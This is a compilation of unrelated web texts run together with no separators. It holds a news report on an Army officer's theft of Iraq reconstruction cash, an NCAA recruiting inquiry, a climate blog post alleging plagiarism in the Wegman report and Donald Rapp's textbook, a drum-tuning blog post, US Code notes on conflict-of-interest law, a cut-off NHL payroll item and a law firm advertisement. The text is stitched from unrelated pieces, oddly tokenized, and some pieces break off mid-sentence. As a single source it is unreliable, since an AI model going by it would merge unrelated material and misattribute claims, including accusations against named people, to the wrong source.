The Army deployed Nguyen to Iraq in April 2007 , where he became a battalion civil affairs officer in the Sunni stronghold of Muqdadiyah , a town of 80,000 about 50 miles northeast of Baghdad .
He was assigned to manage Commander 's Emergency Response Program funds , which came in bundles of uncirculated $ 100 bills .
One of Nguyen 's duties was to make monthly payments of $ 300,000 to the Sons of Iraq , a Sunni - based group under contract to provide security services throughout the nation , according to a March 3 indictment filed in U.S. District Court for the District of Oregon .
The money was stored in a battalion safe .
" Capt .
Nguyen was the only person within his battalion who had the combination to the safe , " the indictment alleged .
" At any given time , Capt .
Nguyen had in excess of $ 300,000 in U.S. currency in the safe . "
Nguyen stole more than $ 690,000 of this money between April 2007 and the end of his tour in June 2008 and mailed it to his Beaverton home , government prosecutors allege .
When he returned to Oregon , he banked $ 387,550 of the stolen cash at Bank of America , Washington Mutual Bank , America 's Credit Union and Heritage Bank .
Internal Revenue Service investigators found that Nguyen made repeated deposits of cash into those personal accounts , always less than $ 10,000 .
Deposits greater than that require the depositor to declare the money with the government in a currency transaction report .
Nguyen made so many deposits , sometimes in a single day , that he exceeded the legal limit , according to the indictment .
" After depositing the currency in the accounts , Capt .
Nguyen purchased a 2008 BMW M3 and a 2009 Hummer H32 , " the government alleged .
Nguyen also purchased computers , electronics , furniture and firearms , the government alleges .
Agents searching his home found $ 300,000 in stolen currency .
Nguyen 's guilty plea before U.S. District Judge Ancer L. Haggerty included an agreement to forfeit all the money and property derived from his thefts , reported the U.S. attorney 's office for the district of Oregon .
-- Bryan Denson
Some " interesting " sites you visit , here .
Share Tweet Stumble Pin It Email
The N.C.A.A. is conducting a wide - ranging investigation into the University of Tennessee ’s football recruiting practices , according to interviews with several prospects , their family members and high school administrators .
A significant part of the investigation is focused on the use of recruiting hostesses who have become folk heroes on Tennessee Internet message boards for their ability to help lure top recruits .
N.C.A.A. officials have visited four prospects and are scheduled to visit two others this week in an investigation covering at least three states .
The inquiry is unusual in its scope and its timing .
It is rare that the N.C.A.A. looks at this wide a swath of one university ’s recruits before the players have signed with a program in February .
Tennessee Athletic Director Mike Hamilton confirmed that an investigation was under way but declined to elaborate .
“ Typically , we do not comment on inquires that are in progress , ” he said Tuesday night in New York .
Since Tennessee Coach Lane Kiffin took over in December 2008 after being fired as the Oakland Raiders ’ coach , the Volunteers have committed at least six secondary N.C.A.A. violations  unintentional violations that provide minimal recruiting or competitive advantage .
GAMES BEING PLAYED RIGHT NOW
[ Update , Dec. 19 : This post has been substantially revised to remove speculation about Donald Rapp ’s possible role in the Wegman report .
I apologize for any embarrassment caused to Donald Rapp or Edward Wegman by that speculation .
The post has also been updated to reflect new information about the provenance of Wegman et al ’s section on tree ring proxies , as well as more background detail on some of the events leading up to the Wegman report .
There are also more details about large swathes of unattributed material found in the Wegman report and in Donald Rapp ’s book Assessing Climate Change .
It is clear that the circumstances and contents of both the Wegman report and Rapp ’s text book deserve closer scrutiny .
Dec. 20 : Comments are now open again . ]
As Climategate devolves into a rerun of old battles about the “ hockey stick ” graph , I thought I would revisit the roots of that benighted controversy and take a look at the chaotic events of a few years back when the politicization of science ( also known as the Republican war on science ) really took hold .
I was planning to write another installment of the “ In the beginning ” series on Steve McIntyre .
So I decided to take a look at the infamous Wegman report that Republican congressman Joe Barton relied on to ensure that the “ numbers added up ” ( or not , as he was sure was more likely ) .
The 2006 report was the work of a mysterious “ ad hoc ” committee led by George Mason University statistics professor Edward Wegman , along with David Scott and Yasmin Said .
With its near - veneration for putative hockey - stick destroyers Steve McIntyre and Ross McKitrick , and its scornful denunciation of Michael Mann and his “ social network ” of like - minded researchers , the report has been a touchstone for contrarians .
But then I started thinking about something that had always bothered me .
How could a trio of statistical experts , all on their own , hope to write a report on a field , climate science , of which they had no previous knowledge or experience ?
Part of the answer lies in the close examination of the Wegman report .
Surprsingly , extensive passages from Wegman et al on proxies have turned up in a skeptic text book by contrarian author Donald Rapp .
And at least one of these common passages on tree ring proxies closely follows a classic text by noted paleoclimatologist Raymond Bradley , but with a key alteration not found in the original .
Moreover , Wegman ’s section on social networks appears to contain some unattributed material from Wikipedia and from a classic sociology text .
As I browsed through the Wegman report , my first inkling of something amiss came in the readable section 2.1 ( p. 13 ) on tree - ring proxies , an interesting blend of mostly reasonable explication spiced with faintly derogatory comments .
And very few specific references to speak of .
Hmmm …
The average width of a tree ring is a function of many variables including the tree species , tree age , stored carbohydrates in the tree , nutrients in the soil , and climatic factors including sunlight , precipitation , temperature , wind speed , humidity , and even carbon dioxide availability in the atmosphere .
Obviously there are many confounding factors so the problem is to extract the temperature signal and to distinguish the temperature signal from the noise caused by the many confounding factors .
I entered a large swathe of text into Google .
And sure enough there were two sources : the Wegman report itself , and a chapter on paleclimatology from a text book called Assessing Climate Change .
I downloaded the chapter and began comparing .
Here ’s the corresponding passage ( with differences in bold or crossout ) :
The average width of a tree ring is a function of many variables including the tree species , tree age , stored carbohydrates in the tree , nutrients in the soil , and climatic factors including sunlight , precipitation , temperature , wind speed , humidity , and even carbon dioxide availability in the atmosphere .
Obviously there are many confounding factors so the problem challenge is to extract the temperature signal and to thus distinguish the temperature signal from the noise caused by the many confounding factors .
It did n’t take long to verify that Wegman ’s entire section on proxies ( covering tree - rings , ice cores and corals ) was to be found almost word for word in the book chapter , although the latter was in much expanded form .
The book version proxy sub-sections contain more detail and references , and there are six proxy types in all .
And the additional references included such exotic ones as Robinson , Robinson and Soon ( 2007 ) , in addition to the more expected names like Bradley and Schweingruber found in Wegman .
In all two and half pages of text from Wegman ( p. 13-15 ) are found almost verbatim in the corresponding sections in Rapp , starting at page 2 : Section 1.1.1.1 ( tree rings ) , section 1.1.1.2 ( ice cores ) and section 1.1.1.6 ( coral ) .
Naturally I assumed that this was an apparent case of plagiarism , something I ’d run across before with the so - called suppressed report from rogue EPA economist Alan Carlin .
So my next step was to look at the book ’s publication details , and set about further research .
Assessing Climate Change Temperatures , Solar Radiation and Heat Balance
Series : Springer Praxis Books
Subseries : Environmental Sciences
Rapp , Donald 2008 , XXX , 374 p. 130 illus. , Hardcover
The textbook author ’s name was vaguely familiar , but I could n’t focus on that .
For I was staring at a date of publication that was surely impossible – 2008 , two full years after the release of the Wegman report .
The Wegman report section was an early version of the text book chapter , not the other way around .
So I had not found the source ( despite my earlier speculation to that effect ) .
But I had found an important new voice among contrarian authors .
Meet Donald Rapp , physicist - engineer and newly minted “ climate expert ” .
I first read about Rapp in a comment by John Mashey at Tamino ’s Open Mind last summer ; apparently , Rapp was one of three USC physicists to sign Fred Singer ’s open letter to the American Physical Society .
So I ’ll let John give a bit of the background ( excerpts have been re-formatted ) :
In one amusing corner , we find 3 senior faculty associated with astronautics at University of Southern California , none of whom who ’ve ever published peer - reviewed work on cliamte science that I can find : have signed the petition , essentially declaring the last 30 years of climate science non-existent .
but are part of a USC effort seeking research funding from California and the Federal government for … climate research , because they can do it better than traditional climate science departments .
The three were Mike Grintman , Joseph Kunc – and Donald Rapp , whose thumbnail resume on the open letter read as follows : Chief Technologist , Mechanical and Chemical Systems , Jet Propulsion Laboratory [ at NASA ] ( retired )
Professor of Physics and Environmental Engineering , University of Texas ( 1973 - 1979 )
Author , “ Assessing Climate Change ” and “ Ice Ages and Interglacials ” Springer - Verlag )
Fellow APS
Mashey goes into more detail about Rapp and the USC research group : Donald Rapp .
He retired from JP in 2002 , and is now a Research Professor @ USC .
See especially his comment : “ I have surveyed the wide field of global climate change energy and I am familiar with the entire literature of climatology . ” …
Now , see : USC Climate Change Research Group ( CCRG ) , which says : “ Traditional oceanographic or atmospheric programs are not necessarily well - equipped for such a challenge .
USC is , however , well positioned to take a lead in this evolving science by building upon its existing strengths in cyber infrastructure and programs in climate research , physics and engineering . ”
“ We propose to formalize our interdisciplinary program in climate change research at USC into the USC Climate Change Institute .
The framework of the Institute will revolve around national and California climate change research programs ( see Appendix ) , which are the expected sources of funding . ”
So perhaps the opening of Rapp ’s weighty tome ( 374 p.! ) should be no surprise :
Global - warming alarmists believe that human production of greenhouse gases , particularly cubon dioxide with its concomitant water vapor feedback mechanism , has begun to add to the natural greenhouse effect , thereby raising global temperatures inordinately during the 20th century , with predictions or further increases in the 21st century that could be catastrophic .
Skipping over paragraphs about James Hansen and Al Gore , we get to :
Naysayers have maintained blogs and circulated reports , but generally have not penetrated the scientific literature that is dominated by alarmist publications .
While the alarmists provide the impression of scientific integrity through peer - reviewed publications , the naysayers often lack the credentials of alamarists but the important thing is data , not credentials .
Is your head spinning in this hall of mirrors yet ?
Well , wait until you see Chapter Two , Temperatures in the past millennium .
( To follow along go to the Amazon reader and punch in “ wegman ” in the search box ) .
The table of contents tells the tale ; a large portion of the chapter is given over to a discussion of the “ hockey stick ” and its critics .
The so - called MBH model is presented in four short pages , and then a long fifteen - page section is given over to Criticisms of the MBH Model , including sub-sections on McIntyre and McKitrick , The Wegman Report , Soon and Baliunas , and Zorita and Von Storch .
But even the so - called MBH model is largely described by quoting directly from the Wegman report :
The papers of Mann et al. in themselves are written in a confusing manner , making it difficult for the reader to discern the actual methodology and what uncertainty is actually associated with these reconstructions .
Vague terms such as “ moderate certainty ” ( Mann et al. 1999 ) give no guidance to the reader as to how such conclusions should be weighed . [ p. 70 ]
Nor will you want to miss the six - page section on blogs .
Of course , McIntyre ’s “ anti-establishment ” Climateaudit.org goes up against the “ establishment ” RealClimate.org , “ which presents the viewpoints of the global - warming alarmists ” .
But McIntyre has a special advantage :
Although the tilt of McIntyre ’s blog is decidedly antithetical to the global·warming alarmists , unlike other anti-warming blogs , Mclntyre has penetrated in to the data and details in most cases and speaks authoritatively on most subjects .
And McIntyre ’s outstanding achievement ( among many others ) ?
… he showed that the IPCC Report ( IPCC , 2001 ) cut off the data in Figure 2.32 to emphasize recent warming .
Such data truncation is certainly improper and may teeter on the hazy borderline of science fraud .
Oh , yes , it ’s back to the future .
Rapp had identified the main “ hide the decline ” talking point of ClimateGate a year before it happened .
Then again , the hockey stick , and the supposed destruction thereof , is always the main talking point .
The chapter concludes with three annotated conclusions , cited from a reference given simply as Anon ( N ) ( and , yes , there ’s also Anon A through M ) .
Here ’s the second :
Less confidence can be placed in large - scale surface temperature reconstructions for the period from A.D. 900 to 1600 .
Presently available proxy evidence indicates that temperatures at many , but not all , individual locations were higher during the past 25 years than during any period of comparable length since A.D. 900 .
Rapp ’s annotations include the following unsubstantiated dismissals of this finding :
This author cannot find any substantial evidence that temperatures were ( as claimed ) generally higher in the past 25 years than they were in 900 .
This author has very little confidence in estimates of temperature prior to 1600 .
Of course , I recognized Anon. ( N ) immediately as the following reference , as given in McKitrick and McIntyre ’s PNAS comment :
National Research Council ( 2006 ) Surface Temperature Reconstructions for the Last 2,000 Years ( Natl Acad Press , Washington , DC ) .
Presumably A through M are also not quite as anonymous as supposed .
Here ’s one last telling quote from the book ’s “ brief summary ” of Wegman ( never mind that all the points had already been made repeatedly ) :
1 . In general they found the writing of MBH somewhat obscure and incomplete .
( This writer found the same ) . [ p. 83 ]
Wow .
Just wow .
Words fail me , almost literally .
Not only did Rapp rely so extensively on Wegman in Chapter 2 ( whle summarily dismissing the peer - reviewed scientifc literature on the subject ) , but , as seen above , he also appears to have three unattributed background sections on proxies nearly verbatim from Wegman et al .
This extreme reliance on a single , dubious source certainly makes the publisher ’s blurb even more disturbing :
[ Nay - sayers ] place little faith in climate models , and claim that the “ hockey stick ” picture of global temperature history is a “ fraud ” approaching the dimensions of cold fusion . …
In this book Donald Rapp attempts to assess the evidence in an objective way .
Although he is not a climate scientist by profession , very few climate scientists have taken a broad systems view of the problem of global warming .
Donald Rapp is a professional systems engineer , having taught in universities for 14 years and with over 25 years ’ experience managing various programs for NASA .
His experience has required the ability to move into a highly technical field , assimilate the content , organize the knowledge base and succinctly describe the field , its content , its unresolved issues and achievements .
Clearly , someone at Springer , the largest publisher of scientific and technical books in the world , has a lot of explaining to do .
A natural question at this point would be : does the Wegman et al passage quoted above have an antecedent in the literature ?
Yes it does .
Here is the opening of section 10.2 , entitled Fundamentals of Dendroclimatology from Raymond Bradley ’s seminal Paleoclimatology : Reconstructing Climates of the Quaternary .
A cross section of most temperate forest trees will show an alternation of lighter and darker bands , each of which is usually continuous around the tree circumference .
These are seasonal growth increments produced by meristematic tissues in the tree ’s cambium .
When viewed in detail ( Fig. 10.1 ) it is clear that they are made up of sequences of large , thin - walled cells ( earlywood ) and more densely packed , thick - walled cells ( latewood ) .
Collectively , each couplet of earlywood and latewood comprises an annual growth increment , more commonly called a tree ring .
The mean width of a ring in any one tree is a function of many variables , including the tree species , tree age , availability of stored food within the tree and of important nutrients in the soil , and a whole complex of climatic factors ( sunshine , precipitation , temperature , wind speed , humidity , and their distribution througnout the year ) .
Here is the opening of Wegman ’s section on tree ring proxies ( p. 13 ) .
Bold words indicate common wording with bold italics for added words and crossouts for removed words or punctuation .
Regular italics indicate intermediate paraphrasing :
A cross section of most a temperate forest trees tree shows variation of lighter and darker bands each of which is that are usually continuous around the circumference of the tree .
These bands are the so - called tree rings and are due to seasonal effects .
Each tree ring is composed of large thin - walled cells called ( early wood ) and smaller more densely packed thick walled cells called ( late wood ) .
The mean average width of a tree ring in any one tree is a function of many variables including the tree species , tree age , availability of stored food carbohydrates in the tree , nutrients in the soil , and climatic factors including sunlight , precipitation , temperature , wind speed , humidity , and their distribution througnout the year even carbon dioxide availability in the atmosphere .
No attribution is given for this passage , although Bradley is cited for another section two pages earlier .
The authors have gratuitously added “ carbon dioxide availability in the atmosphere ” as the last in a list of “ climatic factors ” .
But in the context of the centennial or millennial time scale of interest , carbon dioxide is an anthropogenic factor , like other forms of pollution , not a natural “ climatic ” factor .
To say the least , this change compounds the problem of lack of attribution and bespeaks shoddy scholarship , not to mention poor domain knowledge .
After all that , the discovery in Wegman of more prosaic reliance on lightly edited excerpts from Wikipedia seems almost anti-climatic anticlimactic .
Nevertheless here ’s the opener of the Wikipedia article on social networks , as it appeared in early 2006 :
A social network is a social structure made of nodes which are generally individuals or organizations .
And here is the Wegman et al version , slightly transformed to give a bit more scholarly gravitas :
A social network is a mathematical structure made of nodes , which are generally taken to represent individuals or organizations . [ p. 17 ]
The section goes on to quote most of the article section Introduction to Social Networks pretty well verbatim .
But there ’s more .
Ensuing detail appears to draw heavily , without attribution , from the Wasserman and Faust classic , Social Network Analysis : Methods and Applications ( 1994 , Cambridge University Press ) .
This is but one sample from Wasserman and Faust :
Dyad :
At the most basic level , a linkage or relationship establishes a tie between a pair of actors .
The tie is an inherent property of the pair and therefore is not thought of as pertaining simply to the individual actor .
Many kinds of network analysis are concerned with understanding ties among pairs .
All of these approaches take the dyad as the unit of analysis .
And Wegman ’s rearranged , slightly edited form :
Dyad :
A linkage or relationship establishes a tie at the most basic level between a pair of actors .
The tie is an inherent property of the pair .
Many kinds of network analysis are concerned with understanding ties among pairs and are based on the dyad as the unit of analysis . [ p. 18 ]
I think I ’ve seen enough .
No doubt it would be an understatement to say that we have here , as with Alan Carlin , a case of highly questionable scholarship .
But in the end , of course , the larger issues may well have to do with the formation of the Wegman committee , of which Joe Barton has told us very little :
Following receipt of the letter responses [ from Michael Mann ] , committee staff informally sought advice from independent statisticians to determine how best to assess the statistical information submitted .
Dr. Edward Wegman , a prominent statistics professor at George Mason University who is chair of the National Academy of Sciences ’ ( NAS ) Committee on Applied and Theoretical Statistics , agreed to independently assess the data on a pro bono basis .
So far no one has asked the right questions .
For instance :
Who were the unnamed Barton staffers who had “ discussions ” with Wegman ?
What was the exact timeline of the various discussions and exactly who else was involved ?
Were Ross McKitrick or Steve McIntyre ever involved in discussions with Barton staffers ?
What is the full extent over the years of their co-operation with industry - funded PR firms , think tanks and politicians implacably opposed to the regulation of greenhouse gas emissions ?
As a start on the last question , it should be noted that McIntyre and McKitrick played a starring role in the APCO Worldwide / Friends of Science 2005 film , Climate Catastrophe Cancelled .
As confirmed by a University of Calgary internal audit , APCO Worldwide received $ 170,000 to “ produce , promote and distribute ” the film from a “ research ” fund ( since closed down ) set up by University of Calgary political science Professor Barry Cooper .
Cooper has admitted to “ some ” contributions from oil and gas companies for his fund , and Friends of Science has admitted that Talisman Oil CEO James Buckee made an early contribution to the video project .
APCO Worldwide even tried to mispresent the film as an official University of Calgary joint project , noting in the official press release :
Today , researchers at the University of Calgary , in cooperation with the Friends of Science Society , released a video entitled : Climate Catastrophe Cancelled .
While there is no evidence of direct remuneration to McIntyre and McKitrick , their co-operation with a deceptive industry - funded propaganda campaign is extremely disturbing .
As I write this , Ben Santer has delivered an emotional plea at the annual meeting of the American Geophysical Union .
Here is the conclusion of his personal statement :
Sadly , climate scientists now see and feel interference from political and economic interests .
This interference is pervasive .
Powerful forces are using a criminal act – the theft of over a thousand emails from the U.K. ’s Climatic Research Unit – to advance their own agendas .
These “ forces of unreason ” seek to constrain our ability to speak truth to power .
They seek to skew and distort what we know about the nature and causes of climate change .
Having failed to undermine climate science itself , they seek to destroy the reputations of individual climate scientists .
They seek to destroy men like Phil Jones and Mike Mann , who have devoted their entire careers to the pursuit of scientific knowledge and understanding .
We must not let this stand .
We no longer have the luxury of remaining silent on these issues .
We all have voices .
We need to use them .
It ’s high time those “ forces of unreason ” received the scrutiny reserved thus far for the victims of their attacks .
I will not rest until that happens .
For I ’m not sure there is even a name for this nadir of scholarship , whereby an author relies so completely on work that included his own unattributed contribution , while professing to give a balanced overview .
I recently wrote a post with some ideas on How to record a great drum sound .
Point number 9 in the list was “ Tune the kit “ .
Firstly , I should say – I ’m not an expert on this !
I ’ve never tuned a drum from scratch in my life .
Even so , knowing the basics of tuning , and in particular how to spot when a drum needs tuning , is a hugely valuable skill in the studio .
Some drummers tune their kit every session , some do n’t .
Some are taught the skill from day one , others are n’t .
Some tune their kits to sound good to them , or to sound great in a live context .
Neither of these necessarily guarantee the drums will record well .
I ’ve been lucky to record and mix some outstanding drummers over the years , and in the process I learnt the harsh truth – if the drums sound bad in the room , they ’ll never sound great recorded or mixed .
And the secret of getting a drum to sound great – regardless of how expensive – is to tune it well .
Strictly speaking this is the drummer ’s job , but in the real world it ’s incredibly useful if you can spot a poorly tuned kit and tweak it to sound better – or gently suggest that the drummer does ; )
What is drum tuning ?
Roughly speaking , tuning is about making sure that the drum skin is evenly tensioned , and at the right pitch for the diameter of the drum .
Drums can be tuned up or down , but need to be within a few tones of their “ fundamental ” or sweet spot pitch , to sound their best .
A well - tuned kit with every drum tuned to it ’s sweet spot will sound better in every way – the drums will have power and punch , and have that fantastic “ ring ” to them , rather than just a dull thud , or the classic “ cardboard box ” dead sound .
Once they are tuned , you may choose to add damping to reduce this ringing for recording purposes – but a well - tuned , damped drum will always sound better than a poorly tuned one .
Tuning drums takes time and skill , so many studios go so far as to purchase their own kit which they can keep set up and tuned as they please , to ensure good results when recording – kits can often be tuned differently for live as opposed to recording purposes .
But failing that , an understanding of how drum tuning works , and the ability to solve some basic problems , will be invaluable .
Learning more
The video playlist above gives a great overview of the basics of drum tuning – make sure you check out the “ For drummers only ” tips at the end , too .
In particular , make sure you understand the process of listening to the sound of the drum near each lug – if you tap the drum with even pressure , a constant distance from the edge , the drum should sound the same all the way round .
If not , the tuning needs adjusting .
Tuning experts disagree about exactly the best methods – should a new drum - head be pre-stretched , or simply re-tuned as it wears in , as suggested by Bob Gatzen in the clips above ?
For much more information on this and other issues , there is a great free online guide here :
Prof.Sound ’s Drum Tuning Bible
which goes into far more detail on all aspects of drum tuning .
So now , all you need is a friendly drummer prepared to let you practise on their kit – or even better , give you lessons – and lots of hours to practise !
You can buy Bob Gatzen ’s drum tuning DVD from Amazon , here , if you like .
( Affiliate link )
Do you think about drum tuning when you record ?
Have you ever tried tweaking the drum tuning to improve the sound ?
Prior Provisions
A prior section 201 , act June 25 , 1948 , ch. 645 , 62 Stat.
691 , prescribed penalties for anyone who offered or gave anything of value to an officer or other person to influence his decisions , prior to the general amendment of this chapter by Pub .
L. 87–849 , and is substantially covered by revised section 201 .
Effective Date of 1986 Amendment Pub. L. 99–646 , § 46 ( m ) , , 100 Stat. 3604 , provided that : “ The amendments made by this section [ amending this section ] shall take effect 30 days after the date of enactment of this Act [ ] . ”
Memorandum of Attorney General Regarding Conflict of Interest Provisions of Public Law 87–849 , , 28 F.R. 985 January 28 , 1963 .
Public Law 87 –849 , “ To strengthen the criminal laws relating to bribery , graft , and conflicts of interest , and for other purposes , ” came into force .
A number of departments and agencies of the Government have suggested that the Department of Justice prepare and distribute a memorandum analyzing the conflict of interest provisions contained in the new act .
I am therefore distributing the attached memorandum .
One of the main purposes of the new legislation merits specific mention .
That purpose is to help the Government obtain the temporary or intermittent services of persons with special knowledge and skills whose principal employment is outside the Government .
For the most part the conflict of interest statutes superseded by Public Law 87–849 imposed the same restraints on a person serving the Government temporarily or intermittently as on a full - time employee , and those statutes often had an unnecessarily severe impact on the former .
As a result , they impeded the departments and agencies in the recruitment of experts for important work .
Public Law 87–849 meets this difficulty by imposing a lesser array of prohibitions on temporary and intermittent employees than on regular employees .
I believe that a widespread appreciation of this aspect of the new law will lead to a significant expansion of the pool of talent on which the departments and agencies can draw for their special needs .
Robert F. Kennedy , Attorney General .
Introduction Public Law 87–849 , which came into force , affected seven statutes which applied to officers and employees of the Government and were generally spoken of as the “ conflict of interest ” laws .
These included six sections of the criminal code , 18 U.S.C. 216 , 281 , 283 , 284 , 434 and 1914 , and a statute containing no penalties , section 190 of the Revised Statutes ( 5 U.S.C. 99 ) .
Public Law 87–849 ( sometimes referred to hereinafter as “ the Act ” ) repealed section 190 and one of the criminal statutes , 18 U.S.C. 216 , without replacing them .1
In addition it repealed and supplanted the other five criminal statutes .
It is the purpose of this memorandum to summarize the new law and to describe the principal differences between it and the legislation it has replaced .
The Act accomplished its revisions by enacting new sections 203 , 205 , 207 , 208 and 209 of title 18 of the United States Code and providing that they supplant the above - mentioned sections 281 , 283 , 284 , 434 and 1914 of title 18 respectively .
2
It will be convenient , therefore , after summarizing the principal provisions of the new sections , to examine each section separately , comparing it with its precursor before passing to the next .
First of all , however , it is necessary to describe the background and provisions of the new 18 U.S.C. 202 ( a ) , which has no counterpart among the statutes formerly in effect .
Special Government Employees [ New 18 U.S.C. 202(a )
In the main the prior conflict of interest laws imposed the same restrictions on individuals who serve the Government intermittently or for a short period of time as on those who serve full - time .
The consequences of this generalized treatment were pointed out in the following paragraph of the Senate Judiciary Committee report on the bill which became Public Law 87 – 849 : 3
In considering the application of present law in relation to the Government ’s utilization of temporary or intermittent consultants and advisers , it must be emphasized that most of the existing conflict - of - interest statutes were enacted in the 19th century — that is , at a time when persons outside the Government rarely served it in this way .
The laws were therefore directed at activities of regular Government employees , and their present impact on the occasionally needed experts — those whose main work is performed outside the Government — is unduly severe .
This harsh impact constitutes an appreciable deterrent to the Government ’s obtaining needed part - time services .
The recruiting problem noted by the Committee generated a major part of the impetus for the enactment of Public Law 87 –849 .
The Act dealt with the problem by creating a category of Government employees termed “ special Government employees ” and by excepting persons in this category from certain of the prohibitions imposed on ordinary employees .
The new 18 U.S.C. 202 ( a ) defines the term “ special Government employee ” to include , among others , officers and employees of the departments and agencies who are appointed or employed to serve , with or without compensation , for not more than 130 days during any period of 365 consecutive days either on a full - time or intermittent basis .
Summary of the Main Conflict of Interest Provisions of Public Law 87–849
A regular officer or employee of the Government — that is , one appointed or employed to serve more than 130 days in any period of 365 days — is in general subject to the following major prohibitions ( the citations are to the new sections of Title 18 ) : 1 . He may not , except in the discharge of his official duties , represent anyone else before a court or Government agency in a matter in which the United States is a party or has an interest .
This prohibition applies both to paid and unpaid representation of another ( 18 U.S.C. 203 and 205 ) .
2 . He may not participate in his governmental capacity in any matter in which he , his spouse , minor child , outside business associate or person with whom he is negotiating for employment has a financial interest ( 18 U.S.C. 208 ) .
3 . He may not , after his Government employment has ended , represent anyone other than the United States in connection with a matter in which the United States is a party or has an interest and in which he participated personally and substantially for the Government ( 18 U.S.C. 207 ( a ) ) .
4 . He may not , for 1 year after his Government employment has ended , represent anyone other than the United States in connection with a matter in which the United States is a party or has an interest and which was within the boundaries of his official responsibilities 4 during the last year of his Government service ( 18 U.S.C. 207 ( b ) ) .
This temporary restraint of course gives way to the permanent restraint described in paragraph 3 if the matter is one in which he participated personally and substantially .
5 . He may not receive any salary , or supplementation of his Government salary , from a private source as compensation for his services to the Government ( 18 U.S.C. 209 ) .
A special Government employee is in general subject only to the following major prohibitions : 1 . ( a ) He may not , except in the discharge of his official duties , represent anyone else before a court or Government agency in a matter in which the United States is a party or has in interest and in which he has at any time participated personally and substantially for the Government ( 18 U.S.C. 203 and 205 ) .
( b)
He may not , except in the discharge of his official duties , represent anyone else in a matter pending before the agency he serves unless he has served there no more than 60 days during the past 365 ( 18 U.S.C. 203 and 205 ) .
He is bound by this restraint despite the fact that the matter is not one in which he has ever participated personally and substantially .
The restrictions described in subparagraphs ( a ) and ( b ) apply to both paid and unpaid representation of another .
These restrictions in combination are , of course , less extensive than the one described in the corresponding paragraph 1 in the list set forth above with regard to regular employees .
2 . He may not participate in his governmental capacity in any matter in which he , his spouse , minor child , outside business associate or person with whom he is negotiating for employment has a financial interest ( 18 U.S.C. 208 ) .
3 . He may not , after his Government employment has ended , represent anyone other than the United States in connection with a matter in which the United States is a party or has an interest and in which he participated personally and substantially for the Government ( 18 U.S.C. 207 ( a ) ) .
4 . He may not , for 1 year after his Government employment has ended , represent anyone other than the United States in connection with a matter in which the United States is a party or has an interest and which was within the boundaries of his official responsibility during the last year of his Government service ( 18 U.S.C. 207 ( b ) ) .
This temporary restraint of course gives way to the permanent restriction described in paragraph 3 if the matter is one in which he participated personally and substantially .
It will be seen that paragraphs 2 , 3 , and 4 for special Government employees are the same as the corresponding paragraphs for regular employees .
Paragraph 5 for the latter , describing the bar against the receipt of salary for Government work from a private source , does not apply to special Government employees .
As appears below , there are a number of exceptions to the prohibitions summarized in the two lists .
Statutory Exemptions From Conflict of Interest Laws Congress has in the past enacted statutes exempting persons in certain positions — usually advisory in nature — from the provisions of some or all of the former conflict of interest laws .
Section 2 of the Act grants corresponding exemptions from the new laws with respect to legislative and judicial positions carrying such past exemptions .
However , section 2 excludes positions in the executive branch , an independent agency and the District of Columbia from this grant .
As a consequence , all statutory exemptions for persons serving in these sectors of the Government ended on .
Retired Officers of the Armed Forces Public Law 87 –849 enacted a new 18 U.S.C. 206 which provides in general that the new sections 203 and 205 , replacing 18 U.S.C. 281 and 283 , do not apply to retired officers of the armed forces and other uniformed services .
However , 18 U.S.C. 281 and 283 contain special restrictions applicable to retired officers of the armed forces which are left in force by the partial repealer of those statutes set forth in section 2 of the Act .
The former 18 U.S.C. 284 , which contained a 2 - year disqualification against postemployment activities in connection with claims against the United States , applied by its terms to persons who had served as commissioned officers and whose active service had ceased either by reason of retirement or complete separation .
Its replacement , the broader 18 U.S.C. 207 , also applies to persons in those circumstances .
Section 207 , therefore applies to retired officers of the armed forces and overlaps the continuing provisions of 18 U.S.C. 281 and 283 applicable to such officers although to a different extent than did 18 U.S.C. 284 .
Voiding Transactions in Violation of the Conflict of Interest or Bribery Laws Public Law 87–849 enacted a new section , 18 U.S.C. 218 , which did not supplant a pre-existing section of the criminal code .
However , it was modeled on the last sentence of the former 18 U.S.C. 216 authorizing the President to declare a Government contract void which was entered into in violation of that section .
It will be recalled that section 216 was one of the two statutes repealed without replacement .
The new 18 U.S.C. 218 grants the President and , under Presidential regulations , an agency head the power to void and rescind any transaction or matter in relation to which there has been a “ final conviction ” for a violation of the conflict of interest or bribery laws .
The section also authorizes the Government ’s recovery , in addition to any penalty prescribed by law or in a contract , of the amount expended or thing transferred on behalf of the Government .
Section 218 specifically provides that the powers it grants are “ in addition to any other remedies provided by law . ”
Accordingly , it would not seem to override the decision in United States v. Mississippi Valley Generating Co. , 364 U.S. 520 ( 1961 ) , a case in which there was no “ final conviction . ”
Bibliography
Set forth below are the citations to the legislative history of Public Law 87 –849 and a list of recent material which is pertinent to a study of the act .
The listed 1960 report of the Association of the Bar of the City of New York is particularly valuable .
For a comprehensive bibliography of earlier material relating to the conflict of interest laws , see 13 Record of the Association of the Bar of the City of New York 323 ( May 1958 ) .
Legislative History of Public Law 87 –849 ( H.R. 8140 , 87th Cong . )
1 . Hearings of June 1 and 2 , 1961 , before the Antitrust Subcommittee ( Subcommittee No. 5 ) of the House Judiciary Committee , 87th Cong. , 1st sess . , ser. 3 , on Federal Conflict of Interest Legislation .
2 . H. Rept. 748 , 87th Cong. , 1st sess .
3 . 107 Cong. , Rec. 14774 .
4 . Hearing of , before the Senate Judiciary Committee , 87th Cong. , 2d sess . , on Conflicts of Interest .
5 . S. Rept. 2213 , 87th Cong. , 2d sess .
6 . 108 Cong. Rec. 20805 and 21130 ( daily ed. , October 3 and 4 , 1962 ) .
Many sports fans assume baseball is the game that 's most driven by owners ' pocketbooks .
For proof , they could point to the 2009 playoffs , where the final four teams were all near the top of the league in payroll .
But the sport where spending money most closely equates to winning games is played on ice , not grass and dirt .
From 2000 to 2008 , NHL teams ' winning percentage has a 0.49 correlation to their payroll ( where 1 represents a direct correlation and 0 represents no correlation at all ) .
This number does n't suggest an airtight ...
Proudly Serving Annapolis , Glen Burnie , Severna Park , Crofton , Waldorf , Bowie , Prince Frederick , and Surrounding Areas
Every truck accident is unique , but many involve similar types of negligence on the part of the driver , truck owner or trucking company .
Because the legal team at the Jaklitsch Law Group understands the causes of truck accidents , we know how to investigate your case and maximize the financial value of your truck accident claim .
The Jaklitsch Law Group : The Personal Injury Attorneys
Call for a Free Consultation : ( 301 ) 627-8700 or 866-586-6079
Many common causes of truck accidents involve various types of truck driver negligence , from speeding to following too closely to failing to signal while changing lanes .
Other acts of driver negligence include :
Driving under the influence of drugs or alcohol
Driver inattention
Improper use of prescription drugs
Driver cell phone use
Improper lane changes
Improper emergency stopping
Unsafe highway exit and entry
Driver loss of control
